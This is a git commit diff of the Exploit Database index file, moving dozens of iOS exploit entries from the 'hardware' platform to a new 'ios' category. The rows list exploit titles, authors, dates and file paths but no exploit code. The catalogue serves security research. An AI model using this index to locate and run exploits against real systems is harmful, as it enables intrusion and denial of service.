Updated 04_10_2014

Offensive Security 2014-04-10 04:33:37 +00:00
parent 637e59de55
commit 7493f23711
118 changed files with 2807 additions and 83 deletions

198
files.csv

@ -10207,7 +10207,7 @@ id,file,description,date,author,platform,type,port
11112,platforms/windows/local/11112.c,"HTMLDOC 1.9.x-r1629 local .html buffer overflow(win32) exploit",2010-01-11,"fl0 fl0w",windows,local,0
11113,platforms/php/webapps/11113.txt,"tincan ltd (section) SQL Injection Vulnerability",2010-01-11,"ALTBTA ",php,webapps,0
11116,platforms/php/webapps/11116.html,"Alwjeez Script Database Backup Exploit",2010-01-11,alnjm33,php,webapps,0
11117,platforms/hardware/dos/11117.py,"iOS Udisk FTP Basic Edition - Remote 0day DoS Exploit",2010-01-12,mr_me,hardware,dos,8080
11117,platforms/ios/dos/11117.py,"iOS Udisk FTP Basic Edition - Remote 0day DoS Exploit",2010-01-12,mr_me,ios,dos,8080
11120,platforms/php/webapps/11120.txt,"LayoutCMS 1.0 (SQL/XSS) Multiple Vulnerabilities",2010-01-12,Red-D3v1L,php,webapps,0
11124,platforms/php/webapps/11124.txt,"CiviCRM 3.1 < Beta 5 Multiple XSS Vulnerabilities",2010-01-13,h00die,php,webapps,0
11125,platforms/hardware/dos/11125.pl,"SwiFTP 1.11 - Overflow DoS PoC",2010-01-13,"Julien Bedard",hardware,dos,2121
@ -10329,7 +10329,7 @@ id,file,description,date,author,platform,type,port
11270,platforms/php/webapps/11270.txt,"Joomla VirtueMart Module (Customers_who_bought...) SQL Injection Vulnerability",2010-01-27,B-HUNT3|2,php,webapps,0
11271,platforms/php/webapps/11271.txt,"Joomla Component (com_virtuemart) order_status_id SQL Injection Vulnerability",2010-01-27,B-HUNT3|2,php,webapps,0
11272,platforms/windows/remote/11272.py,"CamShot 1.2 - SEH Overwrite Exploit",2010-01-27,tecnik,windows,remote,0
11273,platforms/hardware/dos/11273.py,"iOS Serversman 3.1.5 - HTTP Remote DoS Exploit",2010-01-27,mr_me,hardware,dos,0
11273,platforms/ios/dos/11273.py,"iOS Serversman 3.1.5 - HTTP Remote DoS Exploit",2010-01-27,mr_me,ios,dos,0
11274,platforms/php/webapps/11274.pl,"Woltlab Burningboard Addon Kleinanzeigenmarkt SQL Injection Exploit",2009-12-21,fred777,php,webapps,0
11276,platforms/windows/dos/11276.txt,"Microsoft Internet Explorer 6.0/7.0 NULL pointer crashes",2010-01-20,Skylined,windows,dos,0
11277,platforms/php/webapps/11277.txt,"Joomla Component com_ccnewsletter Directory Traversal Vulnerability",2010-01-28,B-HUNT3|2,php,webapps,0
@ -10493,11 +10493,11 @@ id,file,description,date,author,platform,type,port
11464,platforms/php/webapps/11464.txt,"Joomla Component com_hdvideoshare SQL Injection Vulnerability",2010-02-15,snakespc,php,webapps,0
11465,platforms/windows/local/11465.py,"Ollydbg 2.00 Beta1 Local Buffer Overflow Exploit",2010-02-15,_SuBz3r0_,windows,local,0
11466,platforms/php/webapps/11466.txt,"microUpload Shell Upload Vulnerability",2010-02-15,Phenom,php,webapps,0
11467,platforms/hardware/dos/11467.py,"iOS My DBLite Edition - Remote 0day DoS Exploit",2010-02-15,"Jason Bowes",hardware,dos,0
11467,platforms/ios/dos/11467.py,"iOS My DBLite Edition - Remote 0day DoS Exploit",2010-02-15,"Jason Bowes",ios,dos,0
11468,platforms/windows/remote/11468.py,"Easy~Ftp Server 1.7.0.2 - Post-Authentication BoF",2010-02-15,dookie,windows,remote,21
11469,platforms/windows/dos/11469.py,"Easy~Ftp Server 1.7.0.2 - Post-Authentication BoF (SEH) (PoC)",2010-02-15,loneferret,windows,dos,0
11470,platforms/windows/dos/11470.py,"Easy~Ftp Server 1.7.0.2 - Post-Authentication BoF (PoC)",2010-02-15,loneferret,windows,dos,0
11472,platforms/hardware/dos/11472.py,"iOS FTP On The Go 2.1.2 - HTTP Remote DoS",2010-02-15,TecR0c,hardware,dos,0
11472,platforms/ios/dos/11472.py,"iOS FTP On The Go 2.1.2 - HTTP Remote DoS",2010-02-15,TecR0c,ios,dos,0
11473,platforms/php/webapps/11473.txt,"Pogodny CMS SQL Injection Vulnerability",2010-02-16,Ariko-Security,php,webapps,0
11474,platforms/php/webapps/11474.txt,"Mambo Component com_acnews [id] SQL Injection Vulnerability",2010-02-16,"Zero Bits and Xzit3",php,webapps,0
11475,platforms/windows/local/11475.txt,"OtsTurntables Free 1.00.047 - (.olf) Universal Buffer Overflow Exploit",2010-02-16,mr_me,windows,local,0
@ -10523,7 +10523,7 @@ id,file,description,date,author,platform,type,port
11496,platforms/php/webapps/11496.txt,"Open Source Classifieds 1.1.0 - Alpha (OSClassi) Multiple Vulnerabilities",2010-02-18,"Sioma Labs",php,webapps,0
11497,platforms/linux/remote/11497.txt,"gitWeb 1.5.2 - Remote Command Execution",2010-02-18,"S2 Crew",linux,remote,0
11498,platforms/php/webapps/11498.txt,"Joomla Plugin Core Design Scriptegrator Local File Inclusion Vulnerability",2010-02-18,"S2 Crew",php,webapps,0
11499,platforms/hardware/dos/11499.pl,"iOS FileApp 1.7 - Remote DoS Exploit",2010-02-18,Ale46,hardware,dos,0
11499,platforms/ios/dos/11499.pl,"iOS FileApp 1.7 - Remote DoS Exploit",2010-02-18,Ale46,ios,dos,0
11500,platforms/windows/remote/11500.py,"Easy~Ftp Server 1.7.0.2 - (HTTP) Remote BoF Exploit",2010-02-18,"ThE g0bL!N",windows,remote,0
11502,platforms/php/webapps/11502.txt,"phpAutoVideo CSRF Vulnerability",2010-02-19,GoLdeN-z3r0,php,webapps,0
11503,platforms/php/webapps/11503.txt,"Litespeed Web Server 4.0.12 - (Add Admin) CSRF and XSS Vulnerabilities",2010-02-19,d1dn0t,php,webapps,0
@ -10537,7 +10537,7 @@ id,file,description,date,author,platform,type,port
11517,platforms/php/webapps/11517.txt,"Netzbrett Database Disclosure Vulnerability",2010-02-20,"ViRuSMaN ",php,webapps,0
11518,platforms/php/webapps/11518.txt,"Softbiz Jobs (news_desc) SQL Injection Vulnerability",2010-02-22,BAYBORA,php,webapps,0
11519,platforms/php/webapps/11519.txt,"Ac4p.com Gallery 1.0 - Multiple Vulnerabilities",2010-02-22,indoushka,php,webapps,0
11520,platforms/hardware/dos/11520.pl,"iOS iFTPStorage 1.2 - Remote Dos Exploit",2010-02-22,Ale46,hardware,dos,0
11520,platforms/ios/dos/11520.pl,"iOS iFTPStorage 1.2 - Remote Dos Exploit",2010-02-22,Ale46,ios,dos,0
11521,platforms/php/webapps/11521.txt,"Ero Auktion 2.0 - (news.php) SQL Injection Vulnerability",2010-02-22,"Easy Laster",php,webapps,0
11522,platforms/php/webapps/11522.txt,"Ero Auktion 2010 - (news.php) SQL Injection Vulnerability",2010-02-22,"Easy Laster",php,webapps,0
11523,platforms/php/webapps/11523.txt,"Galerie Dezign-Box France - Multiple Vulnerabilities",2010-02-22,indoushka,php,webapps,0
@ -10857,8 +10857,8 @@ id,file,description,date,author,platform,type,port
11886,platforms/windows/remote/11886.py,"SAP MaxDB Malformed Handshake Request Remote Code Execution",2010-03-26,"S2 Crew",windows,remote,0
11888,platforms/php/webapps/11888.txt,"DaFun Spirit 2.2.5 - Multiple Remote File Include Vulnerability",2010-03-26,2010-03-26,php,webapps,0
11889,platforms/php/webapps/11889.txt,"leaftec cms multiple vulnerabilities",2010-03-26,Valentin,php,webapps,0
11890,platforms/hardware/dos/11890.txt,"iOS Safari - Bad ""VML"" Remote DoS",2010-03-26,"Nishant Das Patnaik",hardware,dos,0
11891,platforms/hardware/dos/11891.txt,"iOS Safari - Remote DoS",2010-03-26,"Nishant Das Patnaik",hardware,dos,0
11890,platforms/ios/dos/11890.txt,"iOS Safari - Bad ""VML"" Remote DoS",2010-03-26,"Nishant Das Patnaik",ios,dos,0
11891,platforms/ios/dos/11891.txt,"iOS Safari - Remote DoS",2010-03-26,"Nishant Das Patnaik",ios,dos,0
11892,platforms/php/webapps/11892.txt,"post Card (catid) Remote SQL Injection Vulnerability",2010-03-26,"Hussin X",php,webapps,0
11893,platforms/linux/dos/11893.pl,"tPop3d 1.5.3 DoS",2010-03-26,OrderZero,linux,dos,0
11894,platforms/php/webapps/11894.txt,"cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability",2010-03-26,eidelweiss,php,webapps,0
@ -12181,8 +12181,8 @@ id,file,description,date,author,platform,type,port
13865,platforms/php/webapps/13865.txt,"Daily Inspirational Quotes Script SQL Injection Vulnerability",2010-06-14,Valentin,php,webapps,0
13866,platforms/php/webapps/13866.txt,"Joke Website Script SQL Injection and Cross-Site Scripting Vulnerabilities",2010-06-14,Valentin,php,webapps,0
13867,platforms/php/webapps/13867.txt,"E-Book Store SQL Injection Vulnerability",2010-06-14,Valentin,php,webapps,0
13870,platforms/hardware/dos/13870.py,"iOS QuickOffice 3.1.0 - HTTP Method Remote DoS",2010-06-14,"Nishant Das Patnaik",hardware,dos,0
13871,platforms/hardware/dos/13871.py,"iOS Impact PDF Reader 2.0 - POST Method Remote DoS",2010-06-14,"Nishant Das Patnaik",hardware,dos,0
13870,platforms/ios/dos/13870.py,"iOS QuickOffice 3.1.0 - HTTP Method Remote DoS",2010-06-14,"Nishant Das Patnaik",ios,dos,0
13871,platforms/ios/dos/13871.py,"iOS Impact PDF Reader 2.0 - POST Method Remote DoS",2010-06-14,"Nishant Das Patnaik",ios,dos,0
13872,platforms/windows/dos/13872.txt,"SumatraPDF 1.1 - Denial of Service PoC",2010-06-14,"Matthew Bergin",windows,dos,0
13875,platforms/solaris_x86/shellcode/13875.c,"Solaris/x86 - Sync() & reboot() & exit(0) - 48 bytes",2010-06-14,"Jonathan Salwan",solaris_x86,shellcode,0
13876,platforms/windows/dos/13876.py,"File Sharing Wizard 1.5.0 - Buffer Overflow PoC",2010-06-15,m-1-k-3,windows,dos,0
@ -12728,7 +12728,7 @@ id,file,description,date,author,platform,type,port
14534,platforms/php/webapps/14534.txt,"68KB 1.0.0rc4 - Remote File Include Vulnerability",2010-08-03,eidelweiss,php,webapps,0
14536,platforms/hardware/remote/14536.txt,"Unauthorized Access to Root NFS Export on EMC Celerra NAS Appliance",2010-08-03,"Trustwave's SpiderLabs",hardware,remote,0
14537,platforms/multiple/dos/14537.txt,"Oracle MySQL 'ALTER DATABASE' Remote Denial of Service Vulnerability",2010-08-03,"Shane Bester",multiple,dos,0
14538,platforms/hardware/local/14538.txt,"Apple iOS pdf Jailbreak Exploit",2010-08-03,jailbreakme,hardware,local,0
14538,platforms/ios/local/14538.txt,"Apple iOS pdf Jailbreak Exploit",2010-08-03,jailbreakme,ios,local,0
14539,platforms/windows/remote/14539.html,"FathFTP 1.8 (RasIsConnected Method) ActiveX Buffer Overflow (SEH)",2010-08-03,Madjix,windows,remote,0
14541,platforms/php/webapps/14541.txt,"WordPress NextGEN Smooth Gallery 0.12 - Blind SQL Injection Vulnerability",2010-08-03,kaMtiEz,php,webapps,0
14545,platforms/windows/dos/14545.txt,"Progitek Visionner Photos 2.0 - File Format DoS",2010-08-03,antrhacks,windows,dos,0
@ -13183,8 +13183,8 @@ id,file,description,date,author,platform,type,port
15183,platforms/asp/webapps/15183.py,"Bka Haber 1.0 (Tr) - File Disclosure Exploit",2010-10-02,ZoRLu,asp,webapps,0
15184,platforms/windows/local/15184.c,"AudioTran 1.4.2.4 SafeSEH+SEHOP Exploit",2010-10-02,x90c,windows,local,0
15185,platforms/asp/webapps/15185.txt,"SmarterMail 7.x (7.2.3925) - Stored Cross Site Scripting Vulnerability",2010-10-02,sqlhacker,asp,webapps,0
15186,platforms/hardware/remote/15186.txt,"iOS FileApp < 2.0 - Directory Traversal Vulnerability",2010-10-02,m0ebiusc0de,hardware,remote,0
15188,platforms/hardware/dos/15188.py,"iOS FileApp < 2.0 - FTP Remote Denial of Service Exploit",2010-10-02,m0ebiusc0de,hardware,dos,0
15186,platforms/ios/remote/15186.txt,"iOS FileApp < 2.0 - Directory Traversal Vulnerability",2010-10-02,m0ebiusc0de,ios,remote,0
15188,platforms/ios/dos/15188.py,"iOS FileApp < 2.0 - FTP Remote Denial of Service Exploit",2010-10-02,m0ebiusc0de,ios,dos,0
15189,platforms/asp/webapps/15189.txt,"SmarterMail 7.x (7.2.3925) LDAP Injection Vulnerability",2010-10-02,sqlhacker,asp,webapps,0
15191,platforms/asp/webapps/15191.txt,"TradeMC E-Ticaret SQL and XSS Multiple Vulnerabilities",2010-10-02,KnocKout,asp,webapps,0
15193,platforms/windows/dos/15193.pl,"Hanso Player 1.3.0 - (.m3u) Denial of Service Vulnerability",2010-10-03,"xsploited security",windows,dos,0
@ -13576,7 +13576,7 @@ id,file,description,date,author,platform,type,port
15661,platforms/asp/webapps/15661.txt,"Ananda Real Estate 3.4 (list.asp) Multiple SQL Injection",2010-12-02,underground-stockholm.com,asp,webapps,0
15662,platforms/linux/remote/15662.txt,"ProFTPD 1.3.3c compromised source remote root Trojan",2010-12-02,anonymous,linux,remote,21
15663,platforms/windows/local/15663.py,"MediaCoder <= 0.7.5.4797 .m3u Buffer Overflow (SEH)",2010-12-02,"Oh Yaw Theng",windows,local,0
15664,platforms/hardware/remote/15664.txt,"iOS iFTPStorage <= 1.3 - Directory Traversal",2010-12-03,XEL,hardware,remote,0
15664,platforms/ios/remote/15664.txt,"iOS iFTPStorage <= 1.3 - Directory Traversal",2010-12-03,XEL,ios,remote,0
15665,platforms/asp/webapps/15665.txt,"Easy Travel Portal 2 - (travelbycountry.asp) SQL Injection Vulnerability",2010-12-03,"Ulrik Persson",asp,webapps,0
15666,platforms/hardware/webapps/15666.txt,"Multiple D-Link Router Models Authentication Bypass Vulnerability",2010-12-03,"Craig Heffner",hardware,webapps,0
15668,platforms/windows/remote/15668.html,"Image Viewer CP Gold 6 ActiveX TifMergeMultiFiles() Buffer Overflow",2010-12-03,Dr_IDE,windows,remote,0
@ -13998,8 +13998,8 @@ id,file,description,date,author,platform,type,port
16205,platforms/asp/webapps/16205.txt,"DIY Web CMS Multiple Vulnerabilities",2011-02-22,p0pc0rn,asp,webapps,0
16206,platforms/php/webapps/16206.txt,"Galilery 1.0 - Local File Inclusion Vulnerability",2011-02-22,lemlajt,php,webapps,0
16207,platforms/php/webapps/16207.txt,"dotproject 2.1.5 - Multiple Vulnerabilities",2011-02-22,lemlajt,php,webapps,0
16208,platforms/hardware/remote/16208.txt,"iOS FtpDisc 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0
16209,platforms/hardware/remote/16209.txt,"iOS SideBooks 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0
16208,platforms/ios/remote/16208.txt,"iOS FtpDisc 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0
16209,platforms/ios/remote/16209.txt,"iOS SideBooks 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0
16213,platforms/php/webapps/16213.txt,"Hyena Cart (index.php) SQL Injection Vulnerability",2011-02-23,"AtT4CKxT3rR0r1ST ",php,webapps,0
16214,platforms/php/webapps/16214.txt,"tplSoccerStats (player.php) SQL Injection Vulnerability",2011-02-23,"AtT4CKxT3rR0r1ST ",php,webapps,0
16216,platforms/linux/dos/16216.txt,"Red Hat Linux stickiness of /tmp",2011-02-23,"Tavis Ormandy",linux,dos,0
@ -14012,10 +14012,10 @@ id,file,description,date,author,platform,type,port
16225,platforms/cfm/webapps/16225.txt,"Alcassoft's SOPHIA CMS SQL Injection Vulnerability",2011-02-24,p0pc0rn,cfm,webapps,0
16226,platforms/hardware/remote/16226.txt,"iSO Air Files 2.6 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0
16227,platforms/hardware/remote/16227.txt,"iSO Filer Lite 2.1.0 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0
16228,platforms/hardware/remote/16228.txt,"iOS iDocManager 1.0.0 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0
16229,platforms/hardware/remote/16229.txt,"iOS myDBLite 1.1.10 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0
16228,platforms/ios/remote/16228.txt,"iOS iDocManager 1.0.0 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0
16229,platforms/ios/remote/16229.txt,"iOS myDBLite 1.1.10 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0
16230,platforms/windows/dos/16230.py,"Victory FTP Server 5.0 - Denial of Service Exploit",2011-02-24,"C4SS!0 G0M3S",windows,dos,0
16231,platforms/hardware/remote/16231.txt,"iOS Share 1.0 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0
16231,platforms/ios/remote/16231.txt,"iOS Share 1.0 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0
16232,platforms/php/webapps/16232.txt,"GigPress 2.1.10 Wordpress Plugin Stored XSS Vulnerability",2011-02-24,"Saif El-Sherei",php,webapps,0
16233,platforms/php/webapps/16233.txt,"Relevanssi 2.7.2 Wordpress Plugin Stored XSS Vulnerability",2011-02-24,"Saif El-Sherei",php,webapps,0
16234,platforms/netware/dos/16234.rb,"Novell Netware RPC XNFS xdrDecodeString Vulnerability",2011-02-24,"Francis Provencher",netware,dos,0
@ -14053,13 +14053,13 @@ id,file,description,date,author,platform,type,port
16267,platforms/php/webapps/16267.txt,"bitweaver 2.8.0 - Multiple Vulnerabilities",2011-03-02,lemlajt,php,webapps,0
16268,platforms/php/webapps/16268.pl,"cChatBox for vBulletin 3.6.8 and 3.7.x SQL Injection Vulnerability",2011-03-02,DSecurity,php,webapps,0
16270,platforms/linux/dos/16270.c,"vsftpd 2.3.2 - Denial of Service Vulnerability",2011-03-02,"Maksymilian Arciemowicz",linux,dos,0
16271,platforms/hardware/remote/16271.txt,"iOS TIOD 1.3.3 - Directory Traversal",2011-03-03,"R3d@l3rt, H@ckk3y",hardware,remote,0
16271,platforms/ios/remote/16271.txt,"iOS TIOD 1.3.3 - Directory Traversal",2011-03-03,"R3d@l3rt, H@ckk3y",ios,remote,0
16272,platforms/php/webapps/16272.txt,"Limelight Software (article.php) SQL Injection Vulnerability",2011-03-04,eXeSoul,php,webapps,0
16273,platforms/php/webapps/16273.php,"PHP Speedy <= 0.5.2 Wordpress Plugin (admin_container.php) Remote Code Exec Exploit",2011-03-04,mr_me,php,webapps,0
16274,platforms/jsp/webapps/16274.pl,"JBoss Application Server Remote Exploit",2011-03-04,kingcope,jsp,webapps,0
16275,platforms/hardware/remote/16275.txt,"Comtrend ADSL Router CT-5367 C01_R12 Remote Root",2011-03-04,"Todor Donev",hardware,remote,0
16276,platforms/php/webapps/16276.txt,"ADAN Neuronlabs (view.php) SQL Injection Vulnerability",2011-03-04,IRAQ_JAGUAR,php,webapps,0
16278,platforms/hardware/remote/16278.py,"iOS iFileExplorer Free - Directory Traversal",2011-03-04,theSmallNothin,hardware,remote,0
16278,platforms/ios/remote/16278.py,"iOS iFileExplorer Free - Directory Traversal",2011-03-04,theSmallNothin,ios,remote,0
16279,platforms/php/webapps/16279.txt,"MySms 1.0 - Multiple Vulnerabilities",2011-03-05,"AtT4CKxT3rR0r1ST ",php,webapps,0
16280,platforms/php/webapps/16280.py,"Vtiger CRM 5.0.4 Pre-Auth Local File Inclusion Exploit",2011-03-05,TecR0c,php,webapps,0
16281,platforms/php/webapps/16281.txt,"BoutikOne (description.php) SQL Injection Vulnerability",2011-03-05,IRAQ_JAGUAR,php,webapps,0
@ -14746,7 +14746,7 @@ id,file,description,date,author,platform,type,port
16969,platforms/php/webapps/16969.txt,"Log1 CMS 2.0 - Multiple Vulnerabilities",2011-03-14,Aodrulez,php,webapps,0
16970,platforms/windows/remote/16970.rb,"Kolibri <= 2.0 - HTTP Server HEAD Buffer Overflow",2011-08-03,metasploit,windows,remote,0
16971,platforms/windows/local/16971.py,"ABBS Audio Media Player Buffer Overflow Exploit (M3U/LST)",2011-03-14,Rh0,windows,local,0
16972,platforms/hardware/remote/16972.txt,"iOS Checkview 1.1 - Directory Traversal",2011-03-14,kim@story,hardware,remote,0
16972,platforms/ios/remote/16972.txt,"iOS Checkview 1.1 - Directory Traversal",2011-03-14,kim@story,ios,remote,0
16973,platforms/linux/dos/16973.c,"Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT Leak Exploit",2011-03-14,prdelka,linux,dos,0
16974,platforms/android/remote/16974.html,"Android 2.0 ,2.1, 2.1.1 - WebKit Use-After-Free Exploit",2011-03-14,"MJ Keith",android,remote,0
16975,platforms/asp/webapps/16975.txt,"SmarterMail 8.0 - Multiple XSS Vulnerabilities",2011-03-14,"Hoyt LLC Research",asp,webapps,0
@ -16336,7 +16336,7 @@ id,file,description,date,author,platform,type,port
18926,platforms/windows/dos/18926.php,"bsnes 0.87 - Local Denial of Service",2012-05-25,"Yakir Wizman",windows,dos,0
18927,platforms/php/webapps/18927.txt,"socialengine 4.2.2 - Multiple Vulnerabilities",2012-05-25,i4k,php,webapps,0
18929,platforms/windows/remote/18929.rb,"RabidHamster R4 Log Entry sprintf() Buffer Overflow",2012-05-25,metasploit,windows,remote,0
18931,platforms/hardware/dos/18931.rb,"iOS <= 5.1.1 Safari Browser - JS match(), search() Crash PoC",2012-05-25,"Alberto Ortega",hardware,dos,0
18931,platforms/ios/dos/18931.rb,"iOS <= 5.1.1 Safari Browser - JS match(), search() Crash PoC",2012-05-25,"Alberto Ortega",ios,dos,0
18932,platforms/linux/remote/18932.py,"Symantec Web Gateway 5.0.2 - Remote LFI Root Exploit",2012-05-26,muts,linux,remote,0
18933,platforms/windows/remote/18933.rb,"quickshare file share 1.2.1 - Directory Traversal vulnerability",2012-05-27,metasploit,windows,remote,0
18934,platforms/php/webapps/18934.rb,"WeBid converter.php Remote PHP Code Injection",2012-05-27,metasploit,php,webapps,0
@ -19116,8 +19116,8 @@ id,file,description,date,author,platform,type,port
21864,platforms/php/webapps/21864.txt,"PHPWebSite 0.8.3 News Message HTML Injection Vulnerability",2002-09-25,das@hush.com,php,webapps,0
21865,platforms/linux/local/21865.c,"Interbase 5/6 GDS_Lock_MGR UMask File Permission Changing Vulnerability",2002-09-25,grazer,linux,local,0
21866,platforms/multiple/webapps/21866.txt,"ServersCheck Monitoring Software 9.0.12 / 9.0.14 - Stored XSS",2012-10-10,loneferret,multiple,webapps,0
21868,platforms/hardware/remote/21868.rb,"Apple iOS MobileSafari LibTIFF Buffer Overflow",2012-10-09,metasploit,hardware,remote,0
21869,platforms/hardware/remote/21869.rb,"Apple iOS MobileMail LibTIFF Buffer Overflow",2012-10-09,metasploit,hardware,remote,0
21868,platforms/ios/remote/21868.rb,"Apple iOS MobileSafari LibTIFF Buffer Overflow",2012-10-09,metasploit,ios,remote,0
21869,platforms/ios/remote/21869.rb,"Apple iOS MobileMail LibTIFF Buffer Overflow",2012-10-09,metasploit,ios,remote,0
21870,platforms/linux/remote/21870.txt,"Zope 2.x Incorrect XML-RPC Request Information Disclosure Vulnerability",2002-09-26,"Rossen Raykov",linux,remote,0
21871,platforms/linux/local/21871.c,"GV 2.x/3.x Malformed PDF/PS File Buffer Overflow Vulnerability (1)",2002-09-26,zen-parse,linux,local,0
21872,platforms/linux/local/21872.c,"GV 2.x/3.x Malformed PDF/PS File Buffer Overflow Vulnerability (2)",2002-09-26,infamous42md,linux,local,0
@ -21694,7 +21694,7 @@ id,file,description,date,author,platform,type,port
24539,platforms/multiple/remote/24539.rb,"Java Applet JMX Remote Code Execution",2013-02-25,metasploit,multiple,remote,0
24540,platforms/php/webapps/24540.pl,"Brewthology 0.1 - SQL Injection Exploit",2013-02-26,"cr4wl3r ",php,webapps,0
24542,platforms/php/webapps/24542.txt,"Rix4Web Portal - Blind SQL Injection Vulnerability",2013-02-26,L0n3ly-H34rT,php,webapps,0
24543,platforms/hardware/webapps/24543.txt,"iOS IPMap 2.5 - Arbitrary File Upload",2013-02-26,Vulnerability-Lab,hardware,webapps,0
24543,platforms/ios/webapps/24543.txt,"iOS IPMap 2.5 - Arbitrary File Upload",2013-02-26,Vulnerability-Lab,ios,webapps,0
24544,platforms/php/webapps/24544.txt,"MTP Image Gallery 1.0 (edit_photos.php, title param) - XSS Vulnerability",2013-02-26,LiquidWorm,php,webapps,0
24545,platforms/php/webapps/24545.txt,"MTP Guestbook 1.0 - Multiple XSS Vulnerabilities",2013-02-26,LiquidWorm,php,webapps,0
24546,platforms/php/webapps/24546.txt,"MTP Poll 1.0 - Multiple XSS Vulnerabilities",2013-02-26,LiquidWorm,php,webapps,0
@ -21748,7 +21748,7 @@ id,file,description,date,author,platform,type,port
24599,platforms/linux/dos/24599.txt,"CUPS 1.1.x UDP Packet Remote Denial of Service Vulnerability",2004-09-15,"Alvaro Martinez Echevarria",linux,dos,0
24600,platforms/windows/remote/24600.txt,"myserver 0.7 - Directory Traversal vulnerability",2004-09-15,scrap,windows,remote,0
24601,platforms/php/webapps/24601.txt,"BBS E-Market Professional bf_130 (1.3.0) - Multiple File Disclosure Vulnerabilities",2004-09-15,"Jeong Jin-Seok",php,webapps,0
24603,platforms/hardware/webapps/24603.txt,"Remote File Manager 1.2 iOS - Multiple Vulnerabilities",2013-03-06,Vulnerability-Lab,hardware,webapps,0
24603,platforms/ios/webapps/24603.txt,"Remote File Manager 1.2 iOS - Multiple Vulnerabilities",2013-03-06,Vulnerability-Lab,ios,webapps,0
24604,platforms/asp/webapps/24604.txt,"Snitz Forums 2000 Down.ASP HTTP Response Splitting Vulnerability",2004-09-16,"Maestro De-Seguridad",asp,webapps,0
24605,platforms/windows/dos/24605.txt,"Microsoft Windows XP Explorer.EXE TIFF Image Denial of Service Vulnerability",2004-09-16,"Jason Summers",windows,dos,0
24606,platforms/linux/local/24606.c,"Sudo 1.6.8 Information Disclosure Vulnerability",2004-09-18,"Rosiello Security",linux,local,0
@ -22527,12 +22527,12 @@ id,file,description,date,author,platform,type,port
25409,platforms/php/webapps/25409.txt,"Ajax Availability Calendar 3.x.x - Multiple Vulnerabilties",2013-05-13,"AtT4CKxT3rR0r1ST ",php,webapps,0
25410,platforms/php/webapps/25410.txt,"Joomla S5 Clan Roster com_s5clanroster (index.php, id param) - SQL Injection",2013-05-13,"AtT4CKxT3rR0r1ST ",php,webapps,0
25411,platforms/linux/local/25411.py,"No-IP Dynamic Update Client (DUC) 2.1.9 - Local IP Address Stack Overflow",2013-05-13,"Alberto Ortega",linux,local,0
25412,platforms/hardware/webapps/25412.txt,"Wireless Disk PRO 2.3 iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,hardware,webapps,0
25412,platforms/ios/webapps/25412.txt,"Wireless Disk PRO 2.3 iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,ios,webapps,0
25413,platforms/hardware/webapps/25413.txt,"Wifi Photo Transfer 2.1 & 1.1 PRO - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,hardware,webapps,0
25414,platforms/hardware/webapps/25414.txt,"Wifi Album 1.47 iOS - Command Injection Vulnerability",2013-05-13,Vulnerability-Lab,hardware,webapps,0
25415,platforms/hardware/webapps/25415.txt,"Wireless Photo Access 1.0.10 iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,hardware,webapps,0
25414,platforms/ios/webapps/25414.txt,"Wifi Album 1.47 iOS - Command Injection Vulnerability",2013-05-13,Vulnerability-Lab,ios,webapps,0
25415,platforms/ios/webapps/25415.txt,"Wireless Photo Access 1.0.10 iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,ios,webapps,0
25416,platforms/hardware/webapps/25416.txt,"SimpleTransfer 2.2.1 - Command Injection Vulnerabilities",2013-05-13,Vulnerability-Lab,hardware,webapps,0
25417,platforms/hardware/webapps/25417.txt,"File Lite 3.3 & 3.5 PRO iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,hardware,webapps,0
25417,platforms/ios/webapps/25417.txt,"File Lite 3.3 & 3.5 PRO iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,ios,webapps,0
25418,platforms/windows/dos/25418.py,"MiniWeb MiniWeb HTTP Server (build 300) - Crash PoC",2013-05-13,dmnt,windows,dos,0
25419,platforms/windows/local/25419.pl,"Adrenalin Player 2.2.5.3 (.m3u) - Buffer Overflow Exploit (SEH)",2013-05-13,seaofglass,windows,local,0
25420,platforms/multiple/remote/25420.txt,"IBM WebSphere 5.0/5.1/6.0 Application Server Web Server Root JSP Source Code Disclosure Vulnerability",2005-04-13,"SPI Labs",multiple,remote,0
@ -23967,9 +23967,9 @@ id,file,description,date,author,platform,type,port
26885,platforms/php/webapps/26885.txt,"Lighthouse CMS 1.1 Search Cross-Site Scripting Vulnerability",2005-12-19,r0t3d3Vil,php,webapps,0
26886,platforms/linux/dos/26886.pl,"Squid 3.3.5 - DoS PoC",2013-07-16,kingcope,linux,dos,0
26887,platforms/linux/dos/26887.rb,"rpcbind (CALLIT Procedure) UDP Crash PoC",2013-07-16,"Sean Verity",linux,dos,0
26888,platforms/hardware/webapps/26888.txt,"FTP Sprite 1.2.1 iOS - Persistent XSS Vulnerability",2013-07-16,Vulnerability-Lab,hardware,webapps,0
26888,platforms/ios/webapps/26888.txt,"FTP Sprite 1.2.1 iOS - Persistent XSS Vulnerability",2013-07-16,Vulnerability-Lab,ios,webapps,0
26889,platforms/windows/local/26889.pl,"BlazeDVD Pro player 6.1 - Stack Based Buffer Overflow (Direct Ret)",2013-07-16,PuN1sh3r,windows,local,0
